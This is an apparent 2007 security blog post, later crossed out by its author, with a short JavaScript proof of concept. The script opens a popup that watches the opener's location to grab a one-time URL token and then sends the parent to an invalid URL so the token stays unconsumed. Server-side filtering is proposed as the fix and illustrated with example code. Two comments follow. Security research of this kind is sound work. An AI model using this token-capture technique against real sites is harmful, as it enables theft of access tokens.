Friday, April 06, 2007

Onetime url implementation needs more server side protection

Don't read this post. I should not have published it.


I may be repeating things already said about this (it was hard to read the entire thread), but the following anti-PoC works as of today.

<script>
var wnd = window.open("");
wnd.document.open();
wnd.document.write("<head><script>window.setInterval(\"steal()\",5000);function steal(){alert(opener.location);}</" +"script></head><body></body>");
wnd.document.close();
url_randomizer.go('FileDoesNotExist');
</script>




The deal is simple.

  1. Open a new window.
  2. Write code into this window that does the following:
    1. Registers a timer event and keeps watching the location of the parent.
    2. Grabs the token from the parent's location.
  3. Point your parent to an invalid URL or a URL that's not able to process this one-time token.




How to prevent it? I think the best way is to process this token BEFORE the request reaches the server code, for example with input filters. Do this processing for EVERY incoming request, whether it's an image, JavaScript, an invalid resource, 3xx, 4xx, 5xx, whatever.
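A sketch of that filter placement next to the weak one, as an added example that is not code from the original post or from the one-time URL implementation it discusses. The `otu` query parameter, the `/account` page, the token value and every function name are assumptions made for illustration.

```javascript
// Added example; the "otu" parameter and all names here are hypothetical.
class TokenStore {
  constructor() { this.live = new Set(); }
  issue(token) { this.live.add(token); return token; }
  // Check and invalidate in one step: a token is accepted at most once.
  consume(token) { return this.live.delete(token); }
}

const parse = (req) => new URL(req.url, 'http://example.invalid');

// Weak placement: only the page handler touches the token, so a request
// that ends in a 404 leaves the token live.
function weakServer(store) {
  return (req) => {
    const url = parse(req);
    if (url.pathname !== '/account') return { status: 404 };
    const ok = store.consume(url.searchParams.get('otu'));
    return { status: ok ? 200 : 403 };
  };
}

// Filter placement: the token is consumed before routing, for every
// request, whatever status the application later returns.
function filteredServer(store) {
  return (req) => {
    const url = parse(req);
    const token = url.searchParams.get('otu');
    if (token === null || !store.consume(token)) return { status: 403 };
    return { status: url.pathname === '/account' ? 200 : 404 };
  };
}

// Constructed scenario from the post: the token is first sent to a path
// that does not exist, then presented again on the real page.
function replayAfter404(makeServer) {
  const store = new TokenStore();
  const server = makeServer(store);
  const token = store.issue('constructed-token-1');
  const first = server({ url: '/FileDoesNotExist?otu=' + token }).status;
  const liveAfterFirst = store.live.has(token);
  const replay = server({ url: '/account?otu=' + token }).status;
  return { first, liveAfterFirst, replay };
}
```

With the weak placement the token survives the 404 and is accepted on the second request; with the filter it is already spent, so the second request is refused.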


Note: Allow pop-ups in order for this PoC to work.



Back references:
http://wasjournal.blogspot.com/2007/03/one-time-urls-first-implementation.html
http://wasjournal.blogspot.com/2007/03/one-time-urls-broken-if-ajax-is-present.html

2 comments:

kuza55 said...

Just in relation to your crossing things out; you should have published it. We all make mistakes - it sucks when we do, but it's inevitable - what's important is that we learn something from them. :)

Kishor said...

You are right.
Now I'll try even harder to break it.